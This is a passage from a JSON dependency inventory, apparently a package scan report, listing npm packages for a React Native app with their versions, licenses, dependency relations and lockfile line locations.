}, "Version": "2.20.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "base-64@0.1.0", "react-native@0.81.0", "utf8@3.0.0" ], "Locations": [ { "StartLine": 17791, "EndLine": 17809 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-geocoding@0.5.0", "Name": "react-native-geocoding", "Identifier": { "PURL": "pkg:npm/react-native-geocoding@0.5.0", "UID": "62aa0fc36858faee" }, "Version": "0.5.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 17815, "EndLine": 17820 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-geolocation-service@5.3.1", "Name": "react-native-geolocation-service", "Identifier": { "PURL": "pkg:npm/react-native-geolocation-service@5.3.1", "UID": "6b7d33f8d2a45e79" }, "Version": "5.3.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 17821, "EndLine": 17826 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-gesture-handler@2.28.0", "Name": "react-native-gesture-handler", "Identifier": { "PURL": "pkg:npm/react-native-gesture-handler@2.28.0", "UID": "d3ebeb3a3a98035b" }, "Version": "2.28.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@egjs/hammerjs@2.0.17", "hoist-non-react-statics@3.3.2", "invariant@2.2.4", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17827, "EndLine": 17841 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-get-random-values@1.11.0", "Name": "react-native-get-random-values", "Identifier": { "PURL": "pkg:npm/react-native-get-random-values@1.11.0", "UID": "8ca1fe50c759d8f1" }, "Version": "1.11.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "fast-base64-decode@1.0.0", "react-native@0.81.0" ], "Locations": [ { "StartLine": 17842, "EndLine": 17853 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-gif@1.0.3", "Name": "react-native-gif", "Identifier": { "PURL": "pkg:npm/react-native-gif@1.0.3", "UID": "74a01fd164686cef" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 17854, "EndLine": 17862 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-google-maps@1.0.0", "Name": "react-native-google-maps", "Identifier": { "PURL": "pkg:npm/react-native-google-maps@1.0.0", "UID": "3aa348c7fd23b273" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 17863, "EndLine": 17868 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-image-crop-picker@0.41.6", "Name": "react-native-image-crop-picker", "Identifier": { "PURL": "pkg:npm/react-native-image-crop-picker@0.41.6", "UID": "b85b1451ced7e726" }, "Version": "0.41.6", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 17869, "EndLine": 17877 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-image-pan-zoom@2.1.12", "Name": "react-native-image-pan-zoom", "Identifier": { "PURL": "pkg:npm/react-native-image-pan-zoom@2.1.12", "UID": "6ffa3a4d540c988f" }, "Version": "2.1.12", "Licenses": [ "ISC" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17878, "EndLine": 17887 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-image-picker@8.2.1", "Name": "react-native-image-picker", "Identifier": { "PURL": "pkg:npm/react-native-image-picker@8.2.1", "UID": "1874eae132c37b29" }, "Version": "8.2.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17888, "EndLine": 17897 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-image-resizer@1.4.5", "Name": "react-native-image-resizer", "Identifier": { "PURL": "pkg:npm/react-native-image-resizer@1.4.5", "UID": "3c497e969656c2b3" }, "Version": "1.4.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 17898, "EndLine": 17907 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-image-zoom-viewer@3.0.1", "Name": "react-native-image-zoom-viewer", "Identifier": { "PURL": "pkg:npm/react-native-image-zoom-viewer@3.0.1", "UID": "43c4a12e23f09e6d" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-image-pan-zoom@2.1.12", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17908, "EndLine": 17920 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-keyboard-aware-scroll-view@0.9.5", "Name": "react-native-keyboard-aware-scroll-view", "Identifier": { "PURL": "pkg:npm/react-native-keyboard-aware-scroll-view@0.9.5", "UID": "6d814520279f6280" }, "Version": "0.9.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1", "react-native-iphone-x-helper@1.3.1", "react-native@0.81.0" ], "Locations": [ { "StartLine": 17940, "EndLine": 17952 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-keychain@10.0.0", "Name": "react-native-keychain", "Identifier": { "PURL": "pkg:npm/react-native-keychain@10.0.0", "UID": "f529bfefbe2e58c1" }, "Version": "10.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 17953, "EndLine": 17965 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-linear-gradient@2.8.3", "Name": "react-native-linear-gradient", "Identifier": { "PURL": "pkg:npm/react-native-linear-gradient@2.8.3", "UID": "f58ead1cec7ffd8b" }, "Version": "2.8.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17966, "EndLine": 17975 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-localize@3.5.2", "Name": "react-native-localize", "Identifier": { "PURL": "pkg:npm/react-native-localize@3.5.2", "UID": "6883931c48f88cb9" }, "Version": "3.5.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@expo/config-plugins@10.1.2", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17976, "EndLine": 17995 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-maps@1.26.14", "Name": "react-native-maps", "Identifier": { "PURL": "pkg:npm/react-native-maps@1.26.14", "UID": "1e12af472a6ec5a4" }, "Version": "1.26.14", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@types/geojson@7946.0.16", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17996, "EndLine": 18017 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-markdown-display@7.0.2", "Name": "react-native-markdown-display", "Identifier": { "PURL": "pkg:npm/react-native-markdown-display@7.0.2", "UID": "31b86cce27423ce" }, "Version": "7.0.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "css-to-react-native@3.2.0", "markdown-it@10.0.0", "prop-types@15.8.1", "react-native-fit-image@1.5.5", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18018, "EndLine": 18033 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-mmkv@3.3.3", "Name": "react-native-mmkv", "Identifier": { "PURL": "pkg:npm/react-native-mmkv@3.3.3", "UID": "994ee31981c1be6f" }, "Version": "3.3.3", "Licenses": [ "(MIT AND BSD-3-Clause)" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18034, "EndLine": 18043 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-modal@14.0.0-rc.1", "Name": "react-native-modal", "Identifier": { "PURL": "pkg:npm/react-native-modal@14.0.0-rc.1", "UID": "1d1703a2bd0e4824" }, "Version": "14.0.0-rc.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-animatable@1.4.0", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18044, "EndLine": 18056 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-modal-datetime-picker@18.0.0", "Name": "react-native-modal-datetime-picker", "Identifier": { "PURL": "pkg:npm/react-native-modal-datetime-picker@18.0.0", "UID": "35f554e4b96105b2" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native-community/datetimepicker@8.4.5", "prop-types@15.8.1", "react-native@0.81.0" ], "Locations": [ { "StartLine": 18057, "EndLine": 18069 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-modal-selector@2.1.2", "Name": "react-native-modal-selector", "Identifier": { "PURL": "pkg:npm/react-native-modal-selector@2.1.2", "UID": "21fd9893862c051f" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 18070, "EndLine": 18078 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-multiple-select@0.5.12", "Name": "react-native-multiple-select", "Identifier": { "PURL": "pkg:npm/react-native-multiple-select@0.5.12", "UID": "a79b4023d64c8a06" }, "Version": "0.5.12", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "deprecated-react-native-prop-types@5.0.0", "lodash@4.17.21", "prop-types@15.8.1", "react-native-vector-icons@10.3.0", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18079, "EndLine": 18094 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-orientation-locker@1.7.0", "Name": "react-native-orientation-locker", "Identifier": { "PURL": "pkg:npm/react-native-orientation-locker@1.7.0", "UID": "c0e19cd2e8641307" }, "Version": "1.7.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18095, "EndLine": 18110 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-otp-inputs@7.4.0", "Name": "react-native-otp-inputs", "Identifier": { "PURL": "pkg:npm/react-native-otp-inputs@7.4.0", "UID": "7957aaaac741e680" }, "Version": "7.4.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native-clipboard/clipboard@1.16.3", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18111, "EndLine": 18121 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-pager-view@8.0.0", "Name": "react-native-pager-view", "Identifier": { "PURL": "pkg:npm/react-native-pager-view@8.0.0", "UID": "403099a0a3f8b9ef" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18122, "EndLine": 18131 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-paper@5.14.5", "Name": "react-native-paper", "Identifier": { "PURL": "pkg:npm/react-native-paper@5.14.5", "UID": "fa58922e89ac98e8" }, "Version": "5.14.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@callstack/react-theme-provider@3.0.9", "color@3.2.1", "react-native-safe-area-context@5.6.1", "react-native@0.81.0", "react@19.1.0", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 18132, "EndLine": 18151 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-permissions@5.4.2", "Name": "react-native-permissions", "Identifier": { "PURL": "pkg:npm/react-native-permissions@5.4.2", "UID": "79a2b3cd54cbda35" }, "Version": "5.4.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18177, "EndLine": 18192 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-photo-manipulator@1.9.2", "Name": "react-native-photo-manipulator", "Identifier": { "PURL": "pkg:npm/react-native-photo-manipulator@1.9.2", "UID": "25997dec11cfb686" }, "Version": "1.9.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "color-rgba@3.0.0", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18193, "EndLine": 18208 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-push-notification@8.1.1", "Name": "react-native-push-notification", "Identifier": { "PURL": "pkg:npm/react-native-push-notification@8.1.1", "UID": "fc6cb8cf0d3b7818" }, "Version": "8.1.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native-community/push-notification-ios@1.12.0", "react-native@0.81.0" ], "Locations": [ { "StartLine": 18209, "EndLine": 18218 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-quick-crypto@0.7.17", "Name": "react-native-quick-crypto", "Identifier": { "PURL": "pkg:npm/react-native-quick-crypto@0.7.17", "UID": "90e96d7cd3479e6" }, "Version": "0.7.17", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@craftzdog/react-native-buffer@6.1.1", "events@3.3.0", "readable-stream@4.7.0", "string_decoder@1.3.0", "util@0.12.5" ], "Locations": [ { "StartLine": 18232, "EndLine": 18248 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-reanimated@4.3.0", "Name": "react-native-reanimated", "Identifier": { "PURL": "pkg:npm/react-native-reanimated@4.3.0", "UID": "f6a948228ba75bcf" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-is-edge-to-edge@1.3.1", "react-native-worklets@0.8.1", "react-native@0.81.0", "react@19.1.0", "semver@7.7.4" ], "Locations": [ { "StartLine": 18289, "EndLine": 18303 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-reanimated-carousel@4.0.3", "Name": "react-native-reanimated-carousel", "Identifier": { "PURL": "pkg:npm/react-native-reanimated-carousel@4.0.3", "UID": "bbd1dd0bfe45362a" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-gesture-handler@2.28.0", "react-native-reanimated@4.3.0", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18304, "EndLine": 18315 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-responsive-screen@1.4.2", "Name": "react-native-responsive-screen", "Identifier": { "PURL": "pkg:npm/react-native-responsive-screen@1.4.2", "UID": "bfb71ad1353cbeb0" }, "Version": "1.4.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 18328, "EndLine": 18336 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-safe-area-context@5.6.1", "Name": "react-native-safe-area-context", "Identifier": { "PURL": "pkg:npm/react-native-safe-area-context@5.6.1", "UID": "33785137571af435" }, "Version": "5.6.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18337, "EndLine": 18346 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-screens@4.16.0", "Name": "react-native-screens", "Identifier": { "PURL": "pkg:npm/react-native-screens@4.16.0", "UID": "14e8c283d56cb3be" }, "Version": "4.16.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-freeze@1.0.4", "react-native-is-edge-to-edge@1.3.1", "react-native@0.81.0", "react@19.1.0", "warn-once@0.1.1" ], "Locations": [ { "StartLine": 18347, "EndLine": 18361 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-send-intent@1.3.0", "Name": "react-native-send-intent", "Identifier": { "PURL": "pkg:npm/react-native-send-intent@1.3.0", "UID": "1cc4502a0e79a2a0" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 18362, "EndLine": 18370 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-share@12.2.6", "Name": "react-native-share", "Identifier": { "PURL": "pkg:npm/react-native-share@12.2.6", "UID": "4b1b3030d3ed0430" }, "Version": "12.2.6", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 18371, "EndLine": 18379 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-snackbar@2.9.0", "Name": "react-native-snackbar", "Identifier": { "PURL": "pkg:npm/react-native-snackbar@2.9.0", "UID": "44aabf2724d24b3e" }, "Version": "2.9.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18380, "EndLine": 18389 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-snap-carousel@3.9.1", "Name": "react-native-snap-carousel", "Identifier": { "PURL": "pkg:npm/react-native-snap-carousel@3.9.1", "UID": "4b04a9d53d952426" }, "Version": "3.9.1", "Licenses": [ "BSD-3-Clause" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1", "react-addons-shallow-compare@15.6.2", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18390, "EndLine": 18403 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-splash-screen@3.3.0", "Name": "react-native-splash-screen", "Identifier": { "PURL": "pkg:npm/react-native-splash-screen@3.3.0", "UID": "9e834776813a7724" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 18404, "EndLine": 18412 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-sqlite-2@3.6.2", "Name": "react-native-sqlite-2", "Identifier": { "PURL": "pkg:npm/react-native-sqlite-2@3.6.2", "UID": "fac149fc14606bf9" }, "Version": "3.6.2", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "DependsOn": [ "lodash.map@4.6.0", "lodash.zipobject@4.1.3", "react-native@0.81.0", "websql@2.0.3" ], "Locations": [ { "StartLine": 18413, "EndLine": 18426 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-svg@15.14.0", "Name": "react-native-svg", "Identifier": { "PURL": "pkg:npm/react-native-svg@15.14.0", "UID": "d08db966c978b367" }, "Version": "15.14.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "css-select@5.2.2", "css-tree@1.1.3", "react-native@0.81.0", "react@19.1.0", "warn-once@0.1.1" ], "Locations": [ { "StartLine": 18427, "EndLine": 18441 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-svg-transformer@1.5.1", "Name": "react-native-svg-transformer", "Identifier": { "PURL": "pkg:npm/react-native-svg-transformer@1.5.1", "UID": "6c8ac75091a8cd03" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@svgr/core@8.1.0", "@svgr/plugin-jsx@8.1.0", "@svgr/plugin-svgo@8.1.0", "path-dirname@1.0.2", "react-native-svg@15.14.0", "react-native@0.81.0" ], "Locations": [ { "StartLine": 18442, "EndLine": 18457 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-tab-view@4.3.0", "Name": "react-native-tab-view", "Identifier": { "PURL": "pkg:npm/react-native-tab-view@4.3.0", "UID": "cb41ef7e84f2c21a" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-pager-view@8.0.0", "react-native@0.81.0", "react@19.1.0", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 18458, "EndLine": 18471 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-tts@4.1.1", "Name": "react-native-tts", "Identifier": { "PURL": "pkg:npm/react-native-tts@4.1.1", "UID": "abddb07f73bfe419" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 18472, "EndLine": 18477 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-vector-icons@10.3.0", "Name": "react-native-vector-icons", "Identifier": { "PURL": "pkg:npm/react-native-vector-icons@10.3.0", "UID": "31b24ef176641c5a" }, "Version": "10.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1", "yargs@16.2.0" ], "Locations": [ { "StartLine": 18478, "EndLine": 18494 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-video@6.17.0", "Name": "react-native-video", "Identifier": { "PURL": "pkg:npm/react-native-video@6.17.0", "UID": "a1d8cc6e64474f6c" }, "Version": "6.17.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18533, "EndLine": 18542 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-video-controls@2.8.1", "Name": "react-native-video-controls", "Identifier": { "PURL": "pkg:npm/react-native-video-controls@2.8.1", "UID": "6000ecc3f56fa72f" }, "Version": "2.8.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "lodash@4.17.21", "react-native-video@6.17.0", "react-native@0.81.0" ], "Locations": [ { "StartLine": 18543, "EndLine": 18555 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-view-shot@4.0.3", "Name": "react-native-view-shot", "Identifier": { "PURL": "pkg:npm/react-native-view-shot@4.0.3", "UID": "c78ff2ac9b87dbe7" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "html2canvas@1.4.1", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18556, "EndLine": 18568 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-vision-camera@4.7.2", "Name": "react-native-vision-camera", "Identifier": { "PURL": "pkg:npm/react-native-vision-camera@4.7.2", "UID": "ac4c695e7aad703" }, "Version": "4.7.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-reanimated@4.3.0", "react-native-worklets-core@1.6.3", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18569, "EndLine": 18592 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-vision-camera-v3-image-labeling@1.5.0", "Name": "react-native-vision-camera-v3-image-labeling", "Identifier": { "PURL": "pkg:npm/react-native-vision-camera-v3-image-labeling@1.5.0", "UID": "e9d5cf41ce633f39" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-vision-camera@4.7.2", "react-native-worklets-core@1.6.3", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18593, "EndLine": 18607 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-webview@13.16.0", "Name": "react-native-webview", "Identifier": { "PURL": "pkg:npm/react-native-webview@13.16.0", "UID": "58f67900ce92a616" }, "Version": "13.16.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "escape-string-regexp@4.0.0", "invariant@2.2.4", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18608, "EndLine": 18621 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-worklets@0.8.1", "Name": "react-native-worklets", "Identifier": { "PURL": "pkg:npm/react-native-worklets@0.8.1", "UID": "5c581c3aa228029f" }, "Version": "0.8.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@babel/core@7.28.4", "@babel/plugin-transform-arrow-functions@7.27.1", "@babel/plugin-transform-class-properties@7.27.1", "@babel/plugin-transform-classes@7.28.4", "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", "@babel/plugin-transform-optional-chaining@7.27.1", "@babel/plugin-transform-shorthand-properties@7.27.1", "@babel/plugin-transform-template-literals@7.27.1", "@babel/plugin-transform-unicode-regex@7.27.1", "@babel/preset-typescript@7.27.1", "@react-native/metro-config@0.81.0", "convert-source-map@2.0.0", "react-native@0.81.0", "react@19.1.0", "semver@7.7.3" ], "Locations": [ { "StartLine": 18622, "EndLine": 18646 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-worklets-core@1.6.3", "Name": "react-native-worklets-core", "Identifier": { "PURL": "pkg:npm/react-native-worklets-core@1.6.3", "UID": "7a7f1a1c040b5ce8" }, "Version": "1.6.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0", "string-hash-64@1.0.3" ], "Locations": [ { "StartLine": 18647, "EndLine": 18659 } ], "AnalyzedBy": "npm" }, { "ID": "react-redux@9.2.0", "Name": "react-redux", "Identifier": { "PURL": "pkg:npm/react-redux@9.2.0", "UID": "93eda534c90013c4" }, "Version": "9.2.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@types/react@19.2.2", "@types/use-sync-external-store@0.0.6", "react@19.1.0", "redux@5.0.1", "use-sync-external-store@1.6.0" ], "Locations": [ { "StartLine": 18716, "EndLine": 18738 } ], "AnalyzedBy": "npm" }, { "ID": "redux@5.0.1", "Name": "redux", "Identifier": { "PURL": "pkg:npm/redux@5.0.1", "UID": "234dff8f52037b3e" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 18925, "EndLine": 18930 } ], "AnalyzedBy": "npm" }, { "ID": "typescript@5.9.3", "Name": "typescript", "Identifier": { "PURL": "pkg:npm/typescript@5.9.3", "UID": "360e634d66908973" }, "Version": "5.9.3", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "Locations": [ { "StartLine": 20858, "EndLine": 20871 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/code-frame@7.10.4", "Name": "@babel/code-frame", "Identifier": { "PURL": "pkg:npm/%40babel/code-frame@7.10.4", "UID": "e825496a42b09641" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/highlight@7.25.9" ], "Locations": [ { "StartLine": 2386, "EndLine": 2394 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/code-frame@7.27.1", "Name": "@babel/code-frame", "Identifier": { "PURL": "pkg:npm/%40babel/code-frame@7.27.1", "UID": "b9d8e33eaa00ceb6" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-validator-identifier@7.27.1", "js-tokens@4.0.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 139, "EndLine": 152 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/compat-data@7.28.4", "Name": "@babel/compat-data", "Identifier": { "PURL": "pkg:npm/%40babel/compat-data@7.28.4", "UID": "1fb4a28eda012654" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 153, "EndLine": 161 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/generator@7.28.3", "Name": "@babel/generator", "Identifier": { "PURL": "pkg:npm/%40babel/generator@7.28.3", "UID": "44621a8289c9fba6" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/parser@7.28.4", "@babel/types@7.28.4", "@jridgewell/gen-mapping@0.3.13", "@jridgewell/trace-mapping@0.3.31", "jsesc@3.1.0" ], "Locations": [ { "StartLine": 211, "EndLine": 226 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-annotate-as-pure@7.27.3", "Name": "@babel/helper-annotate-as-pure", "Identifier": { "PURL": "pkg:npm/%40babel/helper-annotate-as-pure@7.27.3", "UID": "4dac1ff08722cc3f" }, "Version": "7.27.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 227, "EndLine": 238 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-compilation-targets@7.27.2", "Name": "@babel/helper-compilation-targets", "Identifier": { "PURL": "pkg:npm/%40babel/helper-compilation-targets@7.27.2", "UID": "bf9815df8b4b44d3" }, "Version": "7.27.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/compat-data@7.28.4", "@babel/helper-validator-option@7.27.1", "browserslist@4.26.3", "lru-cache@5.1.1", "semver@6.3.1" ], "Locations": [ { "StartLine": 239, "EndLine": 254 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-create-class-features-plugin@7.28.3", "Name": "@babel/helper-create-class-features-plugin", "Identifier": { "PURL": "pkg:npm/%40babel/helper-create-class-features-plugin@7.28.3", "UID": "c3184142ca73d1" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-member-expression-to-functions@7.27.1", "@babel/helper-optimise-call-expression@7.27.1", "@babel/helper-replace-supers@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1", "@babel/traverse@7.28.4", "semver@6.3.1" ], "Locations": [ { "StartLine": 255, "EndLine": 275 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-create-regexp-features-plugin@7.27.1", "Name": "@babel/helper-create-regexp-features-plugin", "Identifier": { "PURL": "pkg:npm/%40babel/helper-create-regexp-features-plugin@7.27.1", "UID": "18f7f7bcdd672460" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-annotate-as-pure@7.27.3", "regexpu-core@6.4.0", "semver@6.3.1" ], "Locations": [ { "StartLine": 276, "EndLine": 292 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/helper-define-polyfill-provider@0.6.5", "Name": "@babel/helper-define-polyfill-provider", "Identifier": { "PURL": "pkg:npm/%40babel/helper-define-polyfill-provider@0.6.5", "UID": "3572af4f921cfe1e" }, "Version": "0.6.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-compilation-targets@7.27.2", 